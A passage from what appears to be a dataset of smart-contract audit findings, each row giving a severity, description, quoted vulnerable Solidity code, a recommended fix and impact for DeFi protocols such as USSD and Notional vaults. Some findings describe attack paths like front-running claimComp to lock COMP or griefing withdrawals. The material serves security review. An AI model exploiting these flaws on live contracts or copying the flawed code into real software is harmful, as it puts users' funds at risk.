function. It results in selling 0 amount of collateral.\\nSuppose the only collateral in protocol is 1 WBTC; 1 WBTC costs 30_000 USD; UniV3Pool DAI/ USSD has following liquidity: (3000e6 USSD, 2000e18 DAI) And also USSD is underpriced so call rebalance:\\n```\\n function rebalance() override public {\\n uint256 ownval = getOwnValuation(); // it low enough to dive into if statement (see line below) \\n (uint256 USSDamount, uint256 DAIamount) = getSupplyProportion(); // (3000e6 USSD, 2000e18 DAI)\\n if (ownval < 1e6 - threshold) {\\n // peg-down recovery\\n BuyUSSDSellCollateral((USSDamount - DAIamount / 1e12)/2); // 500 * 1e6 = (3000e6 - 2000e18 / 1e12) / 2\\n```\\n\\nTake a look into BuyUSSDSellCollateral (follow comments):\\n```\\n function BuyUSSDSellCollateral(uint256 amountToBuy) internal { // 500e6\\n CollateralInfo[] memory collateral = IUSSD(USSD).collateralList();\\n //uint amountToBuyLeftUSD = amountToBuy * 1e12 * 1e6 / getOwnValuation();\\n uint amountToBuyLeftUSD = amountToBuy * 1e12; // 500e18\\n uint DAItosell = 0;\\n // Sell collateral in order of collateral array\\n for (uint256 i = 0; i < collateral.length; i++) {\\n // 30_000e18 = 1e8 * 1e18 / 10**8 * 30_000e18 / 1e18\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD); // 0\\n // amountToSellUnits = 1e8 * ((500e18 * 1e18 / 30_000e18) / 1e18) / 1e18 = 1e8 * (0) / 1e18 = 0\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n // and finally executes trade of 0 WBTC\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore); // 0 = 0 - 0\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore); // 0 += 0\\n // rest of code\\n```\\n\\nSo protocol will not buy DAI and will not sell DAI for USSD in UniswapV3Pool to support peg of USSD to DAI",Refactor formula of amountToSellUnits\\n```\\n// uint256 amountToSellUnits = (decimals of collateral) * (DAI amount to get for sell) / (price of 1 token of collateral)\\nuint256 amountToSellUnits = collateral[i].token).decimals() * amountToBuyLeftUSD / collateral[i].oracle.getPriceUSD()\\n```\\n,Protocol is not able of partial selling of collateral for token. It block algorithmic pegging of USSD to DAI,"```\\n function rebalance() override public {\\n uint256 ownval = getOwnValuation(); // it low enough to dive into if statement (see line below) \\n (uint256 USSDamount, uint256 DAIamount) = getSupplyProportion(); // (3000e6 USSD, 2000e18 DAI)\\n if (ownval < 1e6 - threshold) {\\n // peg-down recovery\\n BuyUSSDSellCollateral((USSDamount - DAIamount / 1e12)/2); // 500 * 1e6 = (3000e6 - 2000e18 / 1e12) / 2\\n```\\n" +"If collateral factor is high enough, flutter ends up being out of bounds",medium,"In `USSDRebalancer` contract, function `SellUSSDBuyCollateral` will revert everytime a rebalance calls it, provided the collateral factor is greater than all the elements of the `flutterRatios` array.\\nFunction `SellUSSDBuyCollateral` calculates `flutter` as the lowest index of the `flutterRatios` array for which the collateral factor is smaller than the `flutter` ratio.\\n```\\nuint256 cf = IUSSD(USSD).collateralFactor();\\nuint256 flutter = 0;\\nfor (flutter = 0; flutter < flutterRatios.length; flutter++) {\\n if (cf < flutterRatios[flutter]) {\\n break;\\n }\\n}\\n```\\n\\nThe problem arises when, if collateral factor is greater than all flutter values, after the loop `flutter = flutterRatios.length`.\\nThis `flutter` value is used afterwards here:\\n```\\n// rest of code\\nif (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n portions++;\\n}\\n// rest of code\\n```\\n\\nAnd here:\\n```\\n// rest of code\\nif (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n // don't touch DAI if it's needed to be bought (it's already bought)\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n }\\n}\\n// rest of code\\n```\\n\\nAs we can see in the tests of the project, the flutterRatios array and the collateral `ratios` array are set to be of the same length, so if flutter = flutterRatios.length, any call to that index in the `ratios` array will revert with an index out of bounds.",When checking `collateral[i].ratios[flutter]` always check first that flutter is `< flutterRatios.length`.,"High, when the collateral factor reaches certain level, a rebalance that calls `SellUSSDBuyCollateral` will always revert.",```\\nuint256 cf = IUSSD(USSD).collateralFactor();\\nuint256 flutter = 0;\\nfor (flutter = 0; flutter < flutterRatios.length; flutter++) {\\n if (cf < flutterRatios[flutter]) {\\n break;\\n }\\n}\\n```\\n +claimCOMPAndTransfer() COMP may be locked into the contract,high,"Malicious users can keep front-run `claimCOMPAndTransfer()` to trigger `COMPTROLLER.claimComp()` first, causing `netBalance` in `claimCOMPAndTransfer()` to be 0 all the time, resulting in `COMP` not being transferred out and locked in the contract\\n`claimCOMPAndTransfer()` use for ""Claims COMP incentives earned and transfers to the treasury manager contract"" The code is as follows:\\n```\\n function claimCOMPAndTransfer(address[] calldata cTokens)\\n external\\n override\\n onlyManagerContract\\n nonReentrant\\n returns (uint256)\\n {\\n uint256 balanceBefore = COMP.balanceOf(address(this));\\n COMPTROLLER.claimComp(address(this), cTokens);\\n uint256 balanceAfter = COMP.balanceOf(address(this));\\n\\n // NOTE: the onlyManagerContract modifier prevents a transfer to address(0) here\\n uint256 netBalance = balanceAfter.sub(balanceBefore); //<-------@only transfer out `netBalance`\\n if (netBalance > 0) {\\n COMP.safeTransfer(msg.sender, netBalance);\\n }\\n\\n // NOTE: TreasuryManager contract will emit a COMPHarvested event\\n return netBalance;\\n```\\n\\nFrom the above code, we can see that this method only turns out the difference value `netBalance` But `COMPTROLLER.claimComp()` can be called by anyone, if there is a malicious user front-run this transcation to triggers `COMPTROLLER.claimComp()` first This will cause thenetBalance to be 0 all the time, resulting in `COMP` not being transferred out and being locked in the contract.\\nThe following code is from `Comptroller.sol`\\n```\\n function claimComp(address holder, CToken[] memory cTokens) public { //<----------anyone can call it\\n address[] memory holders = new address[](1);\\n holders[0] = holder;\\n claimComp(holders, cTokens, true, true);\\n }\\n```\\n","Transfer all balances, not using `netBalance`",`COMP` may be locked into the contract,"```\\n function claimCOMPAndTransfer(address[] calldata cTokens)\\n external\\n override\\n onlyManagerContract\\n nonReentrant\\n returns (uint256)\\n {\\n uint256 balanceBefore = COMP.balanceOf(address(this));\\n COMPTROLLER.claimComp(address(this), cTokens);\\n uint256 balanceAfter = COMP.balanceOf(address(this));\\n\\n // NOTE: the onlyManagerContract modifier prevents a transfer to address(0) here\\n uint256 netBalance = balanceAfter.sub(balanceBefore); //<-------@only transfer out `netBalance`\\n if (netBalance > 0) {\\n COMP.safeTransfer(msg.sender, netBalance);\\n }\\n\\n // NOTE: TreasuryManager contract will emit a COMPHarvested event\\n return netBalance;\\n```\\n" +repayAccountPrimeDebtAtSettlement() user lost residual cash,high,"in `repayAccountPrimeDebtAtSettlement()` Incorrect calculation of `primeCashRefund` value (always == 0) Resulting in the loss of the user's residual cash\\nwhen settle Vault Account will execute settleVaultAccount()->repayAccountPrimeDebtAtSettlement() In the `repayAccountPrimeDebtAtSettlement()` method the residual amount will be refunded to the user The code is as follows.\\n```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue)) //<--------@audit always ==0\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\n\\nFrom the above code we can see that there is a spelling error\\nnetPrimeDebtChange = accountPrimeStorageValue;\\nprimeCashRefund = netPrimeDebtChange.sub(accountPrimeStorageValue) so primeCashRefund always ==0\\nshould be `primeCashRefund = netPrimeDebtRepaid - accountPrimeStorageValue`","```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n- pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n+ pr.convertDebtStorageToUnderlying(netPrimeDebtRepaid.sub(accountPrimeStorageValue)) \\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\n","`primeCashRefund` always == 0 , user lost residual cash","```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue)) //<--------@audit always ==0\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\n" +`VaultAccountSecondaryDebtShareStorage.maturity` will be cleared prematurely,high,"`VaultAccountSecondaryDebtShareStorage.maturity` will be cleared prematurely during liquidation\\nIf both the `accountDebtOne` and `accountDebtTwo` of secondary currencies are zero, Notional will consider both debt shares to be cleared to zero, and the maturity will be cleared as well as shown below.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function _setAccountMaturity(\\n VaultAccountSecondaryDebtShareStorage storage accountStorage,\\n int256 accountDebtOne,\\n int256 accountDebtTwo,\\n uint40 maturity\\n ) private {\\n if (accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If both debt shares are cleared to zero, clear the maturity as well.\\n accountStorage.maturity = 0;\\n } else {\\n // In all other cases, set the account to the designated maturity\\n accountStorage.maturity = maturity;\\n }\\n }\\n```\\n\\n`VaultLiquidationAction.deleverageAccount` function\\nWithin the `VaultLiquidationAction.deleverageAccount` function, it will call the `_reduceAccountDebt` function.\\nReferring to the `_reduceAccountDebt` function below. Assume that the `currencyIndex` reference to a secondary currency. In this case, the else logic in Line 251 will be executed. An important point to take note of that is critical to understand this bug is that only ONE of the prime rates will be set as it assumes that the other prime rate will not be used (Refer to Line 252 - 255). However, this assumption is incorrect.\\nAssume that the `currencyIndex` is `1`. Then `netUnderlyingDebtOne` parameter will be set to a non-zero value (depositUnderlyingInternal) at Line 261 while `netUnderlyingDebtTwo` parameter will be set to zero at Line 262. This is because, in Line 263 of the `_reduceAccountDebt` function, the `pr[0]` will be set to the prime rate, while the `pr[1]` will be zero or empty. It will then proceed to call the `VaultSecondaryBorrow.updateAccountSecondaryDebt`\\n```\\nFile: VaultLiquidationAction.sol\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n pr[currencyIndex - 1] = primeRate;\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\n\\nWithin the `updateAccountSecondaryDebt` function, at Line 272, assume that `accountStorage.accountDebtTwo` is `100`. However, since `pr[1]` is not initialized, the `VaultStateLib.readDebtStorageToUnderlying` will return a zero value and set the `accountDebtTwo` to zero.\\nAssume that the liquidator calls the `deleverageAccount` function to clear all the debt of the `currencyIndex` secondary currency. Line 274 will be executed, and `accountDebtOne` will be set to zero.\\nNote that at this point, both `accountDebtOne` and `accountDebtTwo` are zero. At Line 301, the `_setAccountMaturity` will set the `accountStorage.maturity = 0` , which clears the vault account's maturity.\\nAn important point here is that the liquidator did not clear the `accountDebtTwo`. Yet, `accountDebtTwo` became zero in memory during the execution and caused Notional to wrongly assume that both debt shares had been cleared to zero.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function updateAccountSecondaryDebt(\\n VaultConfig memory vaultConfig,\\n address account,\\n uint256 maturity,\\n int256 netUnderlyingDebtOne,\\n int256 netUnderlyingDebtTwo,\\n PrimeRate[2] memory pr,\\n bool checkMinBorrow\\n ) internal {\\n VaultAccountSecondaryDebtShareStorage storage accountStorage = \\n LibStorage.getVaultAccountSecondaryDebtShare()[account][vaultConfig.vault];\\n // Check maturity\\n uint256 accountMaturity = accountStorage.maturity;\\n require(accountMaturity == maturity || accountMaturity == 0);\\n \\n int256 accountDebtOne = VaultStateLib.readDebtStorageToUnderlying(pr[0], maturity, accountStorage.accountDebtOne); \\n int256 accountDebtTwo = VaultStateLib.readDebtStorageToUnderlying(pr[1], maturity, accountStorage.accountDebtTwo);\\n if (netUnderlyingDebtOne != 0) {\\n accountDebtOne = accountDebtOne.add(netUnderlyingDebtOne);\\n\\n _updateTotalSecondaryDebt(\\n vaultConfig, account, vaultConfig.secondaryBorrowCurrencies[0], maturity, netUnderlyingDebtOne, pr[0]\\n );\\n\\n accountStorage.accountDebtOne = VaultStateLib.calculateDebtStorage(pr[0], maturity, accountDebtOne)\\n .neg().toUint().toUint80();\\n }\\n\\n if (netUnderlyingDebtTwo != 0) {\\n accountDebtTwo = accountDebtTwo.add(netUnderlyingDebtTwo);\\n\\n _updateTotalSecondaryDebt(\\n vaultConfig, account, vaultConfig.secondaryBorrowCurrencies[1], maturity, netUnderlyingDebtTwo, pr[1]\\n );\\n\\n accountStorage.accountDebtTwo = VaultStateLib.calculateDebtStorage(pr[1], maturity, accountDebtTwo)\\n .neg().toUint().toUint80();\\n }\\n\\n if (checkMinBorrow) {\\n // No overflow on negation due to overflow checks above\\n require(accountDebtOne == 0 || vaultConfig.minAccountSecondaryBorrow[0] <= -accountDebtOne, ""min borrow"");\\n require(accountDebtTwo == 0 || vaultConfig.minAccountSecondaryBorrow[1] <= -accountDebtTwo, ""min borrow"");\\n }\\n\\n _setAccountMaturity(accountStorage, accountDebtOne, accountDebtTwo, maturity.toUint40());\\n }\\n```\\n\\nThe final state will be `VaultAccountSecondaryDebtShareStorage` as follows:\\n`maturity` and `accountDebtOne` are zero\\n`accountDebtTwo` = 100\\n```\\nstruct VaultAccountSecondaryDebtShareStorage {\\n // Maturity for the account's secondary borrows. This is stored separately from\\n // the vault account maturity to ensure that we have access to the proper state\\n // during a roll borrow position. It should never be allowed to deviate from the\\n // vaultAccount.maturity value (unless it is cleared to zero).\\n uint40 maturity;\\n // Account debt for the first secondary currency in either fCash or pCash denomination\\n uint80 accountDebtOne;\\n // Account debt for the second secondary currency in either fCash or pCash denomination\\n uint80 accountDebtTwo;\\n}\\n```\\n\\nFirstly, it does not make sense to have `accountDebtTwo` but no `maturity` in storage, which also means the vault account data is corrupted. Secondly, when `maturity` is zero, it also means that the vault account did not borrow anything from Notional. Lastly, many vault logic would break since it relies on the `maturity` value.\\n`VaultLiquidationAction.liquidateVaultCashBalance` function\\nThe root cause lies in the implementation of the `_reduceAccountDebt` function. Since `liquidateVaultCashBalance` function calls the `_reduceAccountDebt` function to reduce the debt of the vault account being liquidated, the same issue will occur here.","Fetch the prime rate of both secondary currencies because they are both needed within the `updateAccountSecondaryDebt` function when converting debt storage to underlying.\\n```\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n// Remove the line below\\n pr[currencyIndex // Remove the line below\\n 1] = primeRate;\\n// Add the line below\\n pr = VaultSecondaryBorrow.getSecondaryPrimeRateStateful(vaultConfig);\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\n","Any vault logic that relies on the VaultAccountSecondaryDebtShareStorage's maturity value would break since it has been cleared (set to zero). For instance, a vault account cannot be settled anymore as the following `settleSecondaryBorrow` function will always revert. Since `storedMaturity == 0` but `accountDebtTwo` is not zero, Line 399 below will always revert.\\nAs a result, a vault account with secondary currency debt cannot be settled. This also means that the vault account cannot exit since a vault account needs to be settled before exiting, causing users' assets to be stuck within the protocol.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function settleSecondaryBorrow(VaultConfig memory vaultConfig, address account) internal returns (bool) {\\n if (!vaultConfig.hasSecondaryBorrows()) return false;\\n\\n VaultAccountSecondaryDebtShareStorage storage accountStorage = \\n LibStorage.getVaultAccountSecondaryDebtShare()[account][vaultConfig.vault];\\n uint256 storedMaturity = accountStorage.maturity;\\n\\n // NOTE: we can read account debt directly since prime cash maturities never enter this block of code.\\n int256 accountDebtOne = -int256(uint256(accountStorage.accountDebtOne));\\n int256 accountDebtTwo = -int256(uint256(accountStorage.accountDebtTwo));\\n \\n if (storedMaturity == 0) {\\n // Handles edge condition where an account is holding vault shares past maturity without\\n // any debt position.\\n require(accountDebtOne == 0 && accountDebtTwo == 0); \\n } else {\\n```\\n\\nIn addition, the vault account data is corrupted as there is a secondary debt without maturity, which might affect internal accounting and tracking.","```\\nFile: VaultSecondaryBorrow.sol\\n function _setAccountMaturity(\\n VaultAccountSecondaryDebtShareStorage storage accountStorage,\\n int256 accountDebtOne,\\n int256 accountDebtTwo,\\n uint40 maturity\\n ) private {\\n if (accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If both debt shares are cleared to zero, clear the maturity as well.\\n accountStorage.maturity = 0;\\n } else {\\n // In all other cases, set the account to the designated maturity\\n accountStorage.maturity = maturity;\\n }\\n }\\n```\\n" +StrategyVault can perform a full exit without repaying all secondary debt,high,"StrategyVault can perform a full exit without repaying all secondary debt, leaving bad debt with the protocol.\\nNoted from the codebase's comment that:\\nVaults can borrow up to the capacity using the `borrowSecondaryCurrencyToVault` and `repaySecondaryCurrencyToVault` methods. Vaults that use a secondary currency must ALWAYS repay the secondary debt during redemption and handle accounting for the secondary currency themselves.\\nThus, when the StrategyVault-side performs a full exit for a vault account, Notional-side does not check that all secondary debts of that vault account are cleared (= zero) and will simply trust StrategyVault-side has already handled them properly.\\nLine 271 below shows that only validates the primary debt but not the secondary debt during a full exit.\\n```\\nFile: VaultAccountAction.sol\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n }\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n\\n // It's possible that the user redeems more vault shares than they lend (it is not always the case\\n // that they will be increasing their collateral ratio here, so we check that this is the case). No\\n // need to check if the account has exited in full (maturity == 0).\\n if (vaultAccount.maturity != 0) {\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n```\\n","Consider checking that all secondary debts of a vault account are cleared before executing a full exit.\\n```\\n// Add the line below\\n int256 accountDebtOne;\\n// Add the line below\\n int256 accountDebtTwo;\\n\\n// Add the line below\\n if (vaultConfig.hasSecondaryBorrows()) {\\n// Add the line below\\n (/* */, accountDebtOne, accountDebtTwo) = VaultSecondaryBorrow.getAccountSecondaryDebt(vaultConfig, account, pr);\\n// Add the line below\\n }\\n\\n// Remove the line below\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n// Add the line below\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0 && accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n}\\nvaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n```\\n","Leveraged vaults are designed to be as isolated as possible to mitigate the risk to the Notional protocol and its users. However, the above implementation seems to break this principle. As such, if there is a vulnerability in the leverage vault that allows someone to exploit this issue and bypass the repayment of the secondary debt, the protocol will be left with a bad debt which affects the insolvency of the protocol.","```\\nFile: VaultAccountAction.sol\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n }\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n\\n // It's possible that the user redeems more vault shares than they lend (it is not always the case\\n // that they will be increasing their collateral ratio here, so we check that this is the case). No\\n // need to check if the account has exited in full (maturity == 0).\\n if (vaultAccount.maturity != 0) {\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n```\\n" +Unable to transfer fee reserve assets to treasury,high,"Transferring fee reserve assets to the treasury manager contract will result in a revert, leading to a loss of rewards for NOTE stakers.\\n```\\nFile: TreasuryAction.sol\\n /// @notice redeems and transfers tokens to the treasury manager contract\\n function _redeemAndTransfer(uint16 currencyId, int256 primeCashRedeemAmount) private returns (uint256) {\\n PrimeRate memory primeRate = PrimeRateLib.buildPrimeRateStateful(currencyId);\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n );\\n\\n require(actualTransferExternal > 0);\\n return uint256(actualTransferExternal);\\n }\\n```\\n\\nThe value returned by the `TokenHandler.withdrawPrimeCash` function is always less than or equal to zero. Thus, the condition `actualTransferExternal > 0` will always be false, and the `_redeemAndTransfer` function will always revert.\\nThe `transferReserveToTreasury` function depends on `_redeemAndTransfer` function. Thus, it is not possible to transfer any asset to the treasury manager contract.","Negate the value returned by the `TokenHandler.withdrawPrimeCash` function.\\n```\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n// Remove the line below\\n );\\n// Add the line below\\n ).neg();\\n```\\n","The fee collected by Notional is stored in the Fee Reserve. The fee reserve assets will be transferred to Notional's Treasury to be invested into the sNOTE pool. Without the ability to do so, the NOTE stakers will not receive their rewards.","```\\nFile: TreasuryAction.sol\\n /// @notice redeems and transfers tokens to the treasury manager contract\\n function _redeemAndTransfer(uint16 currencyId, int256 primeCashRedeemAmount) private returns (uint256) {\\n PrimeRate memory primeRate = PrimeRateLib.buildPrimeRateStateful(currencyId);\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n );\\n\\n require(actualTransferExternal > 0);\\n return uint256(actualTransferExternal);\\n }\\n```\\n" +Excess funds withdrawn from the money market,high,"Excessive amounts of assets are being withdrawn from the money market.\\n```\\nFile: TokenHandler.sol\\n function _redeemMoneyMarketIfRequired(\\n uint16 currencyId,\\n Token memory underlying,\\n uint256 withdrawAmountExternal\\n ) private {\\n // If there is sufficient balance of the underlying to withdraw from the contract\\n // immediately, just return.\\n mapping(address => uint256) storage store = LibStorage.getStoredTokenBalances();\\n uint256 currentBalance = store[underlying.tokenAddress];\\n if (withdrawAmountExternal <= currentBalance) return;\\n\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n // Redemption data returns an array of contract calls to make from the Notional proxy (which\\n // is holding all of the money market tokens).\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n\\n // This is the total expected underlying that we should redeem after all redemption calls\\n // are executed.\\n uint256 totalUnderlyingRedeemed = executeMoneyMarketRedemptions(underlying, data);\\n\\n // Ensure that we have sufficient funds before we exit\\n require(withdrawAmountExternal <= currentBalance.add(totalUnderlyingRedeemed)); // dev: insufficient redeem\\n }\\n```\\n\\nIf the `currentBalance` is `999,900` USDC and the `withdrawAmountExternal` is `1,000,000` USDC, then there is insufficient balance in the contract, and additional funds need to be withdrawn from the money market (e.g. Compound).\\nSince the contract already has `999,900` USDC, only an additional `100` USDC needs to be withdrawn from the money market to fulfill the withdrawal request of `1,000,000` USDC\\nHowever, instead of withdrawing `100` USDC from the money market, Notional withdraw `1,000,000` USDC from the market as per the `oracle.getRedemptionCalldata(withdrawAmountExternal)` function. As a result, an excess of `990,000` USDC is being withdrawn from the money market",Consider withdrawing only the shortfall amount from the money market.\\n```\\n// Remove the line below\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n// Add the line below\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal // Remove the line below\\n currentBalance);\\n```\\n,"This led to an excessive amount of assets idling in Notional and not generating any returns or interest in the money market, which led to a loss of assets for the users as they would receive a lower interest rate than expected and incur opportunity loss.\\nAttackers could potentially abuse this to pull the funds Notional invested in the money market leading to griefing and loss of returns/interest for the protocol.","```\\nFile: TokenHandler.sol\\n function _redeemMoneyMarketIfRequired(\\n uint16 currencyId,\\n Token memory underlying,\\n uint256 withdrawAmountExternal\\n ) private {\\n // If there is sufficient balance of the underlying to withdraw from the contract\\n // immediately, just return.\\n mapping(address => uint256) storage store = LibStorage.getStoredTokenBalances();\\n uint256 currentBalance = store[underlying.tokenAddress];\\n if (withdrawAmountExternal <= currentBalance) return;\\n\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n // Redemption data returns an array of contract calls to make from the Notional proxy (which\\n // is holding all of the money market tokens).\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n\\n // This is the total expected underlying that we should redeem after all redemption calls\\n // are executed.\\n uint256 totalUnderlyingRedeemed = executeMoneyMarketRedemptions(underlying, data);\\n\\n // Ensure that we have sufficient funds before we exit\\n require(withdrawAmountExternal <= currentBalance.add(totalUnderlyingRedeemed)); // dev: insufficient redeem\\n }\\n```\\n" +Possible to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstanding,high,"It is possible to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstanding. Thus, leaving accounts with small debt that are not profitable to unwind if it needs to liquidate.\\n```\\nFile: VaultValuation.sol\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n ""Must Liquidate All Debt""\\n );\\n```\\n\\n`depositUnderlyingInternal` is always a positive value (Refer to comment on Line 250) that represents the amount of underlying deposited by the liquidator\\n`h.debtOutstanding[currencyIndex]` is always a negative value representing debt outstanding of a specific currency in a vault 